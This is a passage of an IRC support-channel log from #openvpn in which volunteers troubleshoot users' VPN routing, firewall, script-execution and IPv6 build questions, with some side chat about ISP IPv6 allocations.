!man) or (#3) these configs are for a basic multi-user vpn, which you can then build upon to add lans or internet redirecting 00:15 < ngharo> start there, name it 
.ovpn and go 00:16 -!- bauruine [~stefan@91.236.116.112] has quit [Ping timeout: 248 seconds] 00:32 < mnathani> Thanks ngharo 00:38 -!- swat [~swat@ubuntu/member/swat] has joined #openvpn 01:19 <+pekster> dazo_afk: Okay, that was the info I needed. Maybe 2.3.0 wasn't built with this commit then? Because the installation leaves out the utility scripts by default unless a user manually re-installs the tap-windows.exe with the utilities selected. https://github.com/OpenVPN/openvpn-build/commit/95df0695e2106c17dcbb55b661c5669b953b1a6c 01:19 <@vpnHelper> Title: windows-nsis: install tap utilities · 95df069 · OpenVPN/openvpn-build · GitHub (at github.com) 01:24 <+pekster> Oh, I think I found the problem (the installer section isn't named the same in the tap-windows project as it is in openvpn-build's nsis script). I'll verify the cause and send in a patch to correct 01:29 <+pekster> Or, too soon; there's macro magic that's supposed to make it work. I guess I'll dig further to see if the build lacks the right commits from master and see what I find 01:41 -!- bauruine [~stefan@91.236.116.112] has joined #openvpn 01:55 -!- Orbi [~opera@109.129.15.71] has joined #openvpn 01:57 -!- Azrael808 [~peter@212.161.9.162] has joined #openvpn 02:00 -!- Orbi [~opera@109.129.15.71] has quit [Ping timeout: 245 seconds] 02:03 -!- Orbi [~opera@anon-149-134.vpn.ipredator.se] has joined #openvpn 02:09 -!- Orbi [~opera@anon-149-134.vpn.ipredator.se] has quit [Ping timeout: 245 seconds] 02:14 -!- oskie_ is now known as oskie 02:16 -!- Orbi [~opera@anon-185-43.vpn.ipredator.se] has joined #openvpn 02:21 -!- Azrael808 [~peter@212.161.9.162] has quit [Quit: Ex-Chat] 02:31 < Orbi> I removed "writepid /var/run/openvpncl.pid" from the config and the errors "Initialization Sequence Completed": write UDPv4 [EMSGSIZE Path-MTU=1492]: Message too long (code=97)" disappeared 02:31 < Orbi> Does somebody understand the link, if there is one? 
02:44 -!- blackness [black@2001:470:8cf8::9] has joined #openvpn 02:44 < blackness> !openvz 02:44 <@vpnHelper> "openvz" is (#1) http://wiki.openvz.org/VPN_via_the_TUN/TAP_device to learn bout openvz specific stuff with regards to openvpn or (#2) It is usually less painful to switch to a host with better virtualization technology, eg Xen. 03:01 -!- Denial [Denial@cpc15-tonb3-2-0-cust76.16-3.cable.virginmedia.com] has quit [] 03:06 -!- NChief [tomme@unaffiliated/nchief] has quit [Ping timeout: 264 seconds] 03:08 -!- Denial [Denial@cpc15-tonb3-2-0-cust76.16-3.cable.virginmedia.com] has joined #openvpn 03:30 -!- blackness [black@2001:470:8cf8::9] has quit [Ping timeout: 252 seconds] 03:40 -!- brute11k [~brute11k@89.249.235.236] has joined #openvpn 03:49 -!- a_ [~d@64.111.123.163] has quit [Quit: Reconnecting] 03:49 -!- catsup [~d@64.111.123.163] has joined #openvpn 03:54 -!- d12fk [~heiko@exit0.net] has joined #openvpn 04:06 -!- Azrael808 [~peter@212.161.9.162] has joined #openvpn 04:06 -!- Azrael808 [~peter@212.161.9.162] has quit [Client Quit] 04:08 -!- Orbi [~opera@anon-185-43.vpn.ipredator.se] has quit [Read error: Connection reset by peer] 04:08 -!- Orbi [~opera@anon-185-43.vpn.ipredator.se] has joined #openvpn 04:25 -!- Orbi [~opera@anon-185-43.vpn.ipredator.se] has quit [Ping timeout: 245 seconds] 04:27 -!- fu_fu [~Adium@c-71-200-223-226.hsd1.fl.comcast.net] has joined #openvpn 04:28 < fu_fu> morning 04:31 < fu_fu> got a problem: after several hours of use the tunnel seems to go half-down. ping from the server does not return, ping from the client returns normally. when i reload the service on client, pings resume normally. (Windows to windows) 04:31 < fu_fu> the problem last occurred after the hourly rekey 04:33 <+pekster> Sounds like a firewall problem on the client. You're talking about an ICMP ping, right? Not OpenVPN's control-channel --ping option? 
04:34 < fu_fu> yes correct, ping is just the symptom, other data does not flow also 04:34 < fu_fu> how does a firewall issue behave intermittently? 04:34 <+pekster> The reply ping is itself tunneled data. The fact that you get a reply means the tunnel is working 04:34 < fu_fu> only one way 04:35 <+pekster> No, both ways, otherwise you wouldn't get the ICMP echo-response 04:35 < fu_fu> ok, so only from one source then 04:35 < fu_fu> the server >client does not function after hours of use 04:35 < fu_fu> ceases to function 04:36 <+pekster> Sorry, that's patently incorrect. How do you think the "ping" gets back to the client? 04:36 <+pekster> tcpdump the tun interface on the client if you don't believe me 04:36 <+pekster> You'll see an ICMP echo-request packet go from client -> server, then a reply ICMP echo-reply packet from server -> client 04:37 <+pekster> If you don't see that, then you wouldn't get a response in your command window on the ping 04:37 < fu_fu> ok, why won't ping work until i restart the service 04:37 <+pekster> You just said it did work when initiated from the client, right? 04:37 < fu_fu> yes, not from the server thus half-down 04:38 <+pekster> You're not getting it. This isn't an openvpn problem, because the tunnel isn't what's "half down" 04:38 <+pekster> The tunnel is working just fine since the reply traffic comes *back* to the client. Do you understand why this demonstrates that the server can reach the client across the VPN tunnel? 04:39 -!- JPeterson [~JPeterson@s213-103-211-58.cust.tele2.se] has quit [Read error: Connection timed out] 04:39 <+pekster> If you want, increase the verbosity of both client & server to 'verb 5' in the ovpn configuration and see if anything odd appears when this happens. 
Otherwise, look at your OS-level configuration to fix the reason your server apparently replies selectively in a way you don't like 04:40 < fu_fu> i have verb level 5 set 04:40 <+pekster> The server has to *SEND* the ICMP echo-reply packet 04:40 <+pekster> You see? That packet *does* get back to the client. It's just a normal IP packet like any other IP traffic 04:40 < fu_fu> there is no rw after the rekey 04:41 -!- JPeterson [~JPeterson@s213-103-211-58.cust.tele2.se] has joined #openvpn 04:42 < fu_fu> so why doesn't the log reflect the client origin pings? 04:47 <+pekster> No clue. When I use verb5 and ping across the tunnel, I get this in my server logs: 04:47 <+pekster> WRwrWRwr 04:47 < fu_fu> me too, until the problem happens 04:47 <+pekster> But you're getting replies? 04:47 <+pekster> Specifically, something like this: 04:47 <+pekster> Pinging 10.123.123.1 from 10.123.123.100 with 32 bytes of data: 04:47 <+pekster> Reply from 10.123.123.1: bytes=32 time=3ms TTL=128 04:48 <+pekster> If you get a reply, the traffic is coming back to you (obviously.) You can't say you're not getting traffic across the tunnel when you have evidence that you are 04:48 -!- genghi1 [~Adium@p5089BF98.dip.t-dialin.net] has joined #openvpn 04:52 < fu_fu> i am only getting replies from one side, and only after several hours of proper operation 04:53 -!- Minnebo [~Minnebo@office.exabyte.be] has joined #openvpn 04:53 < Minnebo> Hello, i'm openvpn noob! 04:53 < Minnebo> I managed to get it working 04:54 < fu_fu> the client log shows no rw after the rekey 04:54 < Minnebo> I can ping to my server, but i cannot access files 04:58 <+pekster> fu_fu: Can you post your server config file? Maybe you're specifying some option that re-runs on a rekey that's causing you issues; I doubt it, but I can take a glance anyway 04:59 -!- blackness- [black@199.175.53.115] has joined #openvpn 04:59 < blackness-> Is it possible to listen :113 on a OpenVPN HOST and OpenVPN client? 
04:59 < Minnebo> I can access it through its 10.0.8.1 address 04:59 < Minnebo> :w 05:00 < fu_fu> ok 05:00 <+pekster> Minnebo: ping the VPN endpoint? Then how are you trying to access files? Use the VPN IP to reach that server, unless you're also pushing additional routes 05:00 < blackness-> Like, The OpenVPN client has working ident, and the OpenVPN HOST has working ident. 05:01 < Minnebo> pekster, well I can ping to the server on 192.168.100.1 but when I do \\192.168.100.1 it says no access. When i go \\10.0.8.1 i see all the shares. What do I need to configure to get \\192.168.100.1 working? 05:04 <+pekster> holmen: I'm going to bring the conversation back here since, at least for now, I don't need to reference your configs anymore that you don't want shared. Since you have multiple routing tables, you somehow need to add the route for the VPN peer to go out via tap0 05:04 <+pekster> holmen: You might just need to specify a /32 route using the $route_vpn_gateway and $ifconfig_local options, since you really just need a route to the $route_vpn_gateway for your two /1 routes to work (remember, those are there to emulate the behaviour of 'redirect-gateway' as required for your 2nd routing table 05:05 <+pekster> Minnebo: The VPN server is alive at both those IPs? 05:05 < Minnebo> yes 05:05 <+pekster> Are you pushing a route for that IP then across the VPN tunnel? 
Otherwise, maybe that IP is just responding from something else on the client's local network 05:05 < Minnebo> The vpn server runs on the 192.168.100.1 05:06 < Minnebo> and the 10.0.8.1 is the virtual ip 05:06 < Minnebo> our local network is 111 05:06 < Minnebo> but you might be correct 05:07 < Minnebo> i might just change these virtual ip's 05:07 < Minnebo> and give this dhcp 5 addresses 05:07 < Minnebo> then I won't have the problem 05:08 -!- Orbi [~opera@anon-186-110.vpn.ipredator.se] has joined #openvpn 05:08 <+pekster> Minnebo: To access a LAN address like that, you need to push a route to it to the VPN client 05:08 <+pekster> Otherwise the client has no way to know that traffic for 192.168.100.x is supposed to go across the tunnel 05:08 <+pekster> Have you pushed such a route? 05:09 < Minnebo> no 05:09 < Minnebo> its default 05:09 <+pekster> Then this is why it doesn't work 05:09 < Minnebo> config 05:09 <+pekster> It's just chance that you get a reply from some "other" 192.168.100.1 on your client's upstream network 05:09 < Minnebo> k 05:09 < Minnebo> how does the push thing look like? 05:10 < Minnebo> push "route 192.168.100.0 255.255.255.0" 05:10 < Minnebo> ? 05:10 <+pekster> Yup 05:10 < blackness-> Yep. 05:10 < Minnebo> k 05:10 <+pekster> The client will send that to the client and the client will get a route added on connect that sends traffic for that network via the VPN server 05:10 < blackness-> thanks again pekster for all your help. :) 05:10 <+pekster> The server will send* 05:11 <+pekster> Sure 05:11 < blackness-> Feel like helping me with my little problem? 05:11 <+pekster> You can't have "both" servers respond to a port, no 05:12 <+pekster> When you deal with private addresses, your internal LAN doesn't actually exist according to the Internet 05:12 <+pekster> A port is a port. You can't subdivide it further 05:13 < blackness-> what about having it triggered by source_address and respond back to that source? 
05:13 < blackness-> just curious is all.. 05:13 < fu_fu> afk 05:14 < Minnebo> 192.168.100.0 255.255.255.0 10.8.0.5 10.8.0.6 30 I see this in my route print but still no go, perhaps a firewall rule? 05:15 < Minnebo> and can't ping anymore :D 05:15 <+pekster> blackness-: huh? How do you expect to know "which" private host an external client wants to send a packet for based on its source address? 05:15 <+pekster> That doesn't even make any sense 05:16 < fu_fu> bk 05:16 <+pekster> Minnebo: It could be; that depends on how your firewall is set up 05:16 <+pekster> See the note in the /topic (often people's problems are caused by firewalls 05:16 < Minnebo> ty 05:17 < Minnebo> !welcome 05:17 <@vpnHelper> "welcome" is (#1) Start by stating your goal, such as 'I would like to access the internet over my vpn' || new to IRC? see the link in !ask || we may need !logs and !configs and maybe !interface to help you. || See !howto for beginners. || See !route for lans behind openvpn. || !redirect for sending inet traffic through the server. 
|| Also interesting: !man !/30 !topology !iporder !sample !forum 05:17 <@vpnHelper> !wiki !mitm or (#2) Don't use 192.168.1.0/24 or 192.168.0.0/24 (too much potential for conflict) 05:17 <+pekster> Remember to look at it knowing that the source IP will be the VPN address and the destination IP will be 192.168.100.1 05:17 <+pekster> Also, if you're exposing the entire server-side LAN like that, also see: 05:18 <+pekster> !serverlan 05:18 <@vpnHelper> "serverlan" is (#1) for a lan behind a server, the server must have ip forwarding enabled (!ipforward), the server needs to push a route for its lan to clients, and the router of the lan the server is on needs a route added to it (!route_outside_openvpn) or (#2) see !route for a better explanation or (#3) Handy troubleshooting flowchart: http://ircpimps.org/serverlan.png 05:18 <+pekster> The route you pushed is a whole /24, not just a single host 05:18 < Minnebo> yes 05:18 < Minnebo> indeed 05:18 < Minnebo> i'll fix it and relog 05:18 <+pekster> Well, that won't cause a problem getting to that host, just if you wanted to reach other hosts in the /24 05:19 <+pekster> Chances are good it's a firewall issue if you have that route and it's still not working 05:22 < Minnebo> pekster, i think the problem is 05:22 < blackness-> if i set a var of IPs, how should it be? 0.0.0.0,1.1.1.1 ? 05:22 < Minnebo> that the server doesn't know a route back? 05:23 <+pekster> fu_fu: I see nothing in that setup that would cause issues on re-keying or similar. The 'keepalive' directive guarantees that the encapsulating tunnel is still running or that the peer will reconnect, and your ICMP ping from client -> server shows that bi-directional traffic is flowing and being routed as expected 05:23 <+pekster> Your problem is simply not openvpn 05:23 <+pekster> blackness-: huh? 
I need some context here 05:23 < blackness-> i'll be using the var like this: iptables -A INPUT -i eth0 -p tcp -s $IPLIST --dport 2222 -j ACCEPT 05:24 <+pekster> Use ipset for that, or write unique rules for each IP (optionally put them in your own user-defined chain to minimize processing time) 05:24 < blackness-> so a loop would be required if i did a ruleset per IP correct? 05:24 <+pekster> loop? 05:24 < blackness-> im not good enough to use ipset at this point 05:25 < blackness-> yeah, for i in $IPLIST; do ipfilter rule here; done 05:25 < blackness-> which that loop would replace the single --dport 2222 line ofc. 05:25 <+pekster> If you'd like, sure. I don't apply my rules like that and use iptables-restore to load my rules 05:26 < blackness-> welp, time to get to writing a loop :) 05:26 <+pekster> fu_fu: I don't mind keeping your private configuration in a PM, but don't ask me questions there. I'm not your personal paid support, and this channel has other people who can help, and may see something I don't. Plus I don't like answering questions in private that don't have a chance to benefit other people 05:27 <+pekster> !topsecret 05:27 <@vpnHelper> "topsecret" is if your setup is so top secret that you can't post your configs or logs, please leave now and go find support you trust. 05:27 < Minnebo> !route 05:27 <@vpnHelper> "route" is (#1) http://www.secure-computing.net/wiki/index.php/OpenVPN/Routing or https://community.openvpn.net/openvpn/wiki/RoutedLans (same page mirrored) if you have lans behind openvpn, read it DONT SKIM IT or (#2) READ IT DONT SKIM IT! or (#3) See !tcpip for more info about a more basic networking guide 05:28 < Minnebo> !tcpip 05:28 <+pekster> Really your config has nothing to identify you beyond your commented out local IP anyway (and you can just remove comments if you'd like, or even mask your public IP if it wasn't commented. 
masking isn't preferred, but if you do it in a limited fashion no one usually minds much) 05:28 <@vpnHelper> "tcpip" is http://www.redbooks.ibm.com/redbooks/pdfs/gg243376.pdf See chapter 3.1 for useful basic TCP/IP networking knowledge you should probably know 05:29 <+pekster> blackness-: A better way to do that is to use a match like -i $iface -p tcp --dport 1234 -j whitelist 05:29 <+pekster> Of course, you need to create a 'whitelist' chain first 05:29 <+pekster> Then just add rules there matching -s $ip1 -j ACCEPT 05:29 <+pekster> $ip2, etc, etc 05:29 <+pekster> But ipset is faster to do that if you have dozens, hundreds, or even thousands of IPs to do that with 05:31 < Minnebo> what is the difference between push "route 192..." and just route 192... 05:32 <+pekster> The push sends it to the client (assuming it specifies 'pull' or 'client' in its config) while the route command adds a route to the system where that config is at 05:32 < Minnebo> I think that is the problem no? 05:32 < blackness-> oh its just 4 IPs..my known IPs in fact. 05:33 < Minnebo> my server has no route to answer? 05:34 <+pekster> Minnebo: What? You're pushing a route to the IP/network your server is already on 05:34 <+pekster> What are you trying to do? Just route to 192.168.100.1/32 via the VPN? If the server already owns that IP, you just need to push the /32 route and you're done 05:35 < Minnebo> I have: push "route 192.168.100.1/32 255.255.255.0" 05:35 < Minnebo> but should I add 05:35 < Minnebo> route 10.8.0.0 255.255.255.0 in the server config? 05:35 < fu_fu> does OpenVPN offer paid professional support? 05:35 <+pekster> You can't use CIDR 05:36 <+pekster> 192.168.100.1 255.255.255.255 05:36 <+pekster> That's a /32 host netmask 05:36 <+pekster> !cidr 05:36 <@vpnHelper> "cidr" is http://www.oav.net/mirrors/cidr.html 05:36 <+rob0> fu_fu, I think they do, look at their web page. It might only be for OpenVPN Access Server, however. 
05:36 < Minnebo> from the server I cannot ping to my client 05:36 < Minnebo> so it has no route i think 05:36 < Minnebo> :p 05:36 <+pekster> How are you trying to ping it? Via VPN IP? 05:37 < Minnebo> local 05:37 < Minnebo> no yes 05:37 < Minnebo> the dhcp ip I get from the openvpn 05:37 <+pekster> Then it's your firewall that's a problem 05:37 < Minnebo> damn 05:38 <+pekster> You don't usually need to ping the client from the server to get access to resources on the server that the client initiates. Not if your firewall is set up in a sane way 05:38 < Minnebo> i'll test an fwd-accept-all 05:39 <+pekster> Let me put it this way: if you can ping from client to whatever server-side IP you want and verify (via tcpdump or wireshark or whatever) that it's actually going across the VPN tunnel, then anything else after that is your firewall config 05:39 <+pekster> If you can't ping your target, you either have a routing or firewall problem 05:44 -!- Inst [blackfores@unaffiliated/inst] has joined #openvpn 05:44 < Inst> hi! 05:44 < Inst> <# 05:44 < Inst> http://community.openvpn.net/openvpn/wiki/TrafficObfuscation 05:44 <@vpnHelper> Title: TrafficObfuscation – OpenVPN Community (at community.openvpn.net) 05:45 < blackness-> what about it? 05:46 < Inst> just wondering if anyone has any experience with it 05:46 < holmen> !cidr 05:46 <@vpnHelper> "cidr" is http://www.oav.net/mirrors/cidr.html 05:46 -!- Inst [blackfores@unaffiliated/inst] has left #openvpn ["Leaving"] 05:46 -!- bakery [~qjkh@124.248.205.28] has joined #openvpn 05:48 < bakery> oh, hey, it appears the gov manually blocked my IP 05:48 * bakery facepalms 05:50 <+pekster> heh. 
You're "interesting" now :P 05:50 <+pekster> Lousy censorship :( 05:51 < bakery> they did this to me twice 05:51 < bakery> i'm wondering if my VPS providers are going to start bitching at me because I get their expensive IPs blocked 05:54 < Minnebo> pekster, 05:54 < Minnebo> my fucking god :D 05:54 < Minnebo> i open internet 05:55 < Minnebo> and navigate to 192.168.100.1 and I get an interface of a modem O_o 05:55 < Minnebo> :D 05:55 < Minnebo> i'll test this at home again 05:55 <+pekster> Told you it was probably an upstream IP that was another 192.168.100.1 05:55 <+pekster> RFC1918 lets anyone use the private IP space for any purpose 05:56 < Minnebo> but i dont get it, my route says to use another gw 05:56 < Minnebo> then why does he still reach this modem page: p 05:56 <+pekster> That's why I said to trace the ping from the client to make sure it's going over the right interface 05:56 <+pekster> If it doesn't your routing is screwed up 05:57 -!- bakedin [SouthOfThe@216.131.64.53] has joined #openvpn 05:57 <+pekster> If it does, then follow the packet to make sure it's getting to the peer at the other end of the tunnel 05:57 < Minnebo> with wireshark 05:57 <+pekster> Sure 05:57 < Minnebo> k 05:57 -!- bakery [~qjkh@124.248.205.28] has quit [Ping timeout: 260 seconds] 05:57 < Minnebo> well gtg now visit some customers i'll look at this again tonight! 05:58 < Minnebo> thx for your help 06:02 -!- holmen [~holmen@h-30-250.a176.priv.bahnhof.se] has quit [Quit: Changing server] 06:02 -!- holmen [~holmen@h-30-250.a176.priv.bahnhof.se] has joined #openvpn 06:02 -!- Minnebo [~Minnebo@office.exabyte.be] has quit [Ping timeout: 260 seconds] 06:23 -!- holmen [~holmen@h-30-250.a176.priv.bahnhof.se] has quit [Quit: leaving] 06:26 -!- holmen [~holmen@h-30-250.a176.priv.bahnhof.se] has joined #openvpn 06:27 -!- NChief [tomme@unaffiliated/nchief] has joined #openvpn 06:46 -!- fu_fu [~Adium@c-71-200-223-226.hsd1.fl.comcast.net] has quit [Quit: Leaving.] 
06:50 -!- bakedin [SouthOfThe@216.131.64.53] has quit [Ping timeout: 252 seconds] 06:50 -!- blackness- [black@199.175.53.115] has quit [Ping timeout: 264 seconds] 06:50 -!- bakery [blackfores@216.131.70.179] has joined #openvpn 06:53 -!- bauruine [~stefan@91.236.116.112] has quit [Ping timeout: 245 seconds] 06:55 -!- bakery [blackfores@216.131.70.179] has quit [Ping timeout: 245 seconds] 06:56 -!- bakery [~qjkh@124.248.205.28] has joined #openvpn 06:56 -!- tuxick [~userMurf@tuxick.xs4all.nl] has joined #openvpn 06:56 < tuxick> lo 06:56 <@ecrist> good morning 06:56 -!- bauruine [~stefan@91.236.116.112] has joined #openvpn 06:57 < tuxick> on ubuntu trying to use update-resolv-conf, but getting "Failed running command ( --up/--down): could not execute external program" 06:57 < tuxick> without any clue/explanation. script is executable of course 06:57 <@ecrist> so, the update-resolv-conf script isn't working 06:57 < tuxick> it lacks some verbosity :) 06:57 <@ecrist> have you tried executing it as the user you run the openvpn process as? 
06:58 < tuxick> starting it as root 06:58 <@ecrist> let me see your config 06:58 < tuxick> added an 'echo FOO' to that script, i only see that echo when i run ./update-resolv-conf 06:59 < tuxick> well, config works, except the "up /etc/openvpn/update-resolv-conf" bit 06:59 <@ecrist> config, please 06:59 <@ecrist> also, an ls -l update-resolv-conf 07:00 < tuxick> world executable 07:00 < tuxick> sec for config 07:00 <@ecrist> I'd like to see the output, please 07:01 < tuxick> -rwxr-xr-x 07:01 <@ecrist> you're not very good at following directions 07:02 < tuxick> it's on my netbook, which is busy, paste will take a bit 07:02 <@ecrist> meh, I've got other things to do 07:04 < tuxick> i'll doublecheck when system update is done :) 07:07 -!- blackness- [~black@ip98-185-21-138.rn.hr.cox.net] has joined #openvpn 07:07 -!- blackness- [~black@ip98-185-21-138.rn.hr.cox.net] has quit [Client Quit] 07:08 -!- bauruine [~stefan@91.236.116.112] has quit [Quit: Leaving] 07:39 -!- cjs226 [~cjs226@99-61-64-43.lightspeed.austtx.sbcglobal.net] has quit [] 07:57 -!- sukosevato [sukosevato@a202101.upc-a.chello.nl] has joined #openvpn 08:33 -!- gustavoz [~gustavoz@host212.200-82-114.telecom.net.ar] has joined #openvpn 08:34 < gustavoz> hi, a quick question i couldn't find a quick answer to, are non-ipv6 builds deprecated for 2.3+ ? 08:38 < plaisthos> gustavoz: there are no non ipv6 builds 08:39 < gustavoz> plaisthos: ok thanks, then i guess the answer is yes :) 08:39 < plaisthos> basically 2.2 had no or only limited ipv6 support and 2.3 has ipv6 support 08:40 < gustavoz> exactly, i could build 2.2.x on a non-ipv6 enabled toolchain, but on 2.3 that option is missing 08:40 < plaisthos> gustavoz: You have not ipv6 enabled toolchain? 08:41 < gustavoz> plaisthos: sure, on buildroot we give that option when possible, that's the reason for my question, at the moment it doesn't seem possible without patching around, probably a lot 08:42 < plaisthos> gustavoz: what is that? SunOS 4.x? 
08:42 < gustavoz> plaisthos: a tool for building embedded linux root filesystems / firmwares / whatever 08:43 < plaisthos> gustavoz: but these still have the ipv6 library functions 08:43 < gustavoz> plaisthos: on uClibc not necessarily 08:43 < plaisthos> not ipv6 enabled toolchain I would expect to miss functions like getaddrinfo 08:43 -!- Orbi [~opera@anon-186-110.vpn.ipredator.se] has quit [Quit: Orbi] 08:44 < gustavoz> since it's tailored to be really small when the libc is configured for non-ipv6 builds some structures are missing too 08:44 < gustavoz> for instance in6_pktinfo 08:45 < gustavoz> s/instance/example/ :) 08:46 -!- cjs226 [~cjs226@99-42-101-89.lightspeed.austtx.sbcglobal.net] has joined #openvpn 08:48 < plaisthos> Yeah. There is no ipv4 only version of openvpn in 2.3 08:48 < plaisthos> time to move on ;) 08:48 < gustavoz> cool, thanks, i'm not about to bitch about it, just wanted to know :) 08:49 < gustavoz> the option is given when possible, there are no guarantees for future versions 08:49 < gustavoz> it's not like you can build Qt without a full C++ toolchain for example 08:55 * tuxick mumbles about addrinfo 08:55 < plaisthos> tuxick: ?! 08:57 <+pekster> gustavoz: IPv6 should work fine on uClibc; OpenWRT uses that on its backend and supports IPv6 08:58 <+pekster> Maybe that project can offer hints as to the linking required for OpenVPN to build against it? I haven't looked at the kernel code on recent OpenWRT versions to see if they had to make adjustments or not, but it sounds like it's doable. If OpenVPN won't build cleanly, I'm sure patches or discussion on the dev mailing list would be appreciated 08:58 < tuxick> plaisthos: nevermind :) 09:00 < gustavoz> pekster: yes that's true, it's just that buildroot is more option-Y for the toolchain than openwrt 09:00 <+pekster> Sure. 
And if your buildroot lacks support you have lower-level issues to fix first 09:00 <+pekster> I'm just suggesting a place to start if you want to see how a project has managed uClibc in particular with IPv6 given that they're both targeted to embedded systems 09:01 < gustavoz> it's just a matter of accounting for it in Kconfig, hence my question if it's intended or just broken 09:01 <+pekster> Sure 09:02 < gustavoz> i'm all for ipv6 support by default, just covering my ass so to speak when some freaky asks about why 09:02 <+pekster> "Because IPv4 is busted" is a nice answer ;) 09:03 <+pekster> IMO it's foolish to design or publish a system these days without IPv6 support available. Maybe not active if you're part of the large IPv4-only Internet still, but the age is coming to an end ;) 09:03 < gustavoz> it's like the non-crypto option being gone (!openssl & !polarssl), it's a damn vpn package, you WANT crypto 09:03 <+pekster> Right. GRE or IPIP is for tunneling without crypto :P 09:04 * pekster is greatly looking forward to the day when everything is more or less globally uniquely identifiable. It'll be just like the 1980's all over again :D 09:05 -!- Azrael808 [~peter@212.161.9.162] has joined #openvpn 09:09 < gustavoz> heh, i wish my ISP would have IPv6 connectivity, it's like the dark ages here 09:09 < plaisthos> gustavoz: don't wish for it 09:09 < plaisthos> one provider here now gives its customers IPv6 because they are running out of IPv4 09:09 < plaisthos> and you get Dualstack lite 09:13 < gustavoz> ouch! 
09:15 < tuxick> when i requested a /64 for office ISP told me they could only give me 64 addresses 09:16 < tuxick> assuming i had some sales clown on phone, but it turned out correct 09:16 <+pekster> wow, that's nuts 09:16 < tuxick> "sorry that's all we can do now" 09:16 <+pekster> The recommendation is a /64 or even a /58 for *residential* networks 09:16 < tuxick> i have native /64 for my home dsl :) 09:16 <+pekster> And larger for offices 09:16 < tuxick> ye 09:17 <+pekster> One thing I'm hoping we don't see is segregated tiers of IPv6 "service" where the lower tiers just give you a handful of IPs for home devices (say a /120 or something) and they have you pay a "premium" for proper IPv6 access 09:18 <+rob0> We WILL see. Greed, ignorance and incompetence are the rule. 09:18 < tuxick> idd 09:18 <+hazardous> my isp gives /56 09:19 <+pekster> One of the "good guys" then 09:19 -!- Minnebo [~Minnebo@office.exabyte.be] has joined #openvpn 09:25 -!- Devastator [~devas@unaffiliated/devastator] has quit [Ping timeout: 264 seconds] 09:27 -!- Devastator [~devas@186.214.14.9] has joined #openvpn 09:31 -!- Devastator [~devas@186.214.14.9] has quit [Changing host] 09:31 -!- Devastator [~devas@unaffiliated/devastator] has joined #openvpn 09:35 -!- bsdgeek [~bsdgeek@91-66-20-106-dynip.superkabel.de] has joined #openvpn 09:42 -!- cornfeed [~cornfeed@unaffiliated/cornfeed] has left #openvpn ["Once you know what it is you want to be true, instinct is a very useful device for enabling you to know that it is"] 09:53 < plaisthos> tuxick: 64 addresses?! 09:53 <+hazardous> pekster: rdns too! and static ips! and v4 subnets! 
and symmetrical 09:53 <+hazardous> this has made me hate normal 'big monopoly' isps so much 09:54 < tuxick> plaisthos: ye, i was convinced some sales manager misunderstood the 64 bit 09:56 <+hazardous> 07:16:00 < tuxick> assuming i had some sales clown on phone, but it turned out correct 09:56 <+hazardous> i've had some sales guy at comcast tell me each ipv6 was subject to the same $5/IP/month charge for static ipv6 single addresses 09:57 < tuxick> haha 09:58 <+rob0> And Comcast is among the ipv6 leaders. In the organization they probably do have ipv6 clue. But the suits run the show, and they're going to milk every possible penny out of it. 10:01 -!- afuentes [~afuentes@213.37.131.197.static.user.ono.com] has joined #openvpn 10:01 < plaisthos> tuxick: that sounds like a mixup between /64 and 64 ips and then someone forced the technicians to really do 64 ips 10:02 <+pekster> $5/ip/mo? haha 10:03 < tuxick> no, in the end i got someone on phone who explained they just didn't have the right hardware yet 10:03 <+pekster> python tells me: >>> 2**64*5 10:03 <+pekster> 92233720368547758080 10:03 <+pekster> Imagine them sending you a bill for that :P 10:03 < tuxick> but maybe that was a poor tech just covering for management idiots 10:03 <+pekster> Plus your monthly service cost :P 10:22 -!- master_of_master [~master_of@p57B54C0D.dip.t-dialin.net] has quit [Ping timeout: 276 seconds] 10:24 -!- Porkepix_ [~Porkepix@ppp-seco11pa2-46-193-142.4.wb.wifirst.net] has joined #openvpn 10:24 -!- master_of_master [~master_of@p57B52905.dip.t-dialin.net] has joined #openvpn 10:24 -!- mikkel [~mikkel@80-71-132-15.u.parknet.dk] has joined #openvpn 10:25 -!- Porkepi__ [~Porkepix@ppp-seco11pa2-46-193-129.224.wb.wifirst.net] has joined #openvpn 10:25 -!- Porkepix [~Porkepix@ppp-seco11pa2-46-193-129.224.wb.wifirst.net] has quit [Ping timeout: 248 seconds] 10:25 -!- Porkepi__ is now known as Porkepix 10:27 -!- WinstonSmith [~WinstonSm@unaffiliated/winstonsmith] has quit [Ping timeout: 252 seconds] 10:28 -!- Porkepix_ [~Porkepix@ppp-seco11pa2-46-193-142.4.wb.wifirst.net] has quit [Ping timeout: 255 seconds] 10:29 -!- gustavoz [~gustavoz@host212.200-82-114.telecom.net.ar] has quit [Quit: Leaving] 10:30 -!- WinstonSmith [~WinstonSm@unaffiliated/winstonsmith] has joined #openvpn 10:32 -!- Minnebo [~Minnebo@office.exabyte.be] has quit [Ping timeout: 264 seconds] 10:48 < genghi1> hi… I noticed that when using learn-address, the $3 parameter is not preserved when a client is disconnecting, only connecting. Is that a known issue? 10:50 <+pekster> genghi1: That's intended behaviour according to the manpage. What's your use-case for wanting it on a delete action? 10:54 < genghi1> well… I can certainly do without it, but it would just make my iptables management easier if it was there 10:54 < genghi1> it is not really a problem for me 10:54 < genghi1> I was inserting the cn name into the comments for the rules 10:55 <+pekster> Why do you need to care about the comment when deleting them? 10:55 < genghi1> I was deleting them the lazy way by matching the rule itself and not the rule number. 10:55 < genghi1> that requires matching the comment too 10:55 -!- bakedin [~qjkh@111.192.134.20] has joined #openvpn 10:56 <+pekster> Oh. Well, don't use a comment then? :) 10:56 -!- bakery [~qjkh@124.248.205.28] has quit [Ping timeout: 260 seconds] 10:57 <+pekster> Or use a creative scripting solution to store it in a temp file and reference it by IP. 
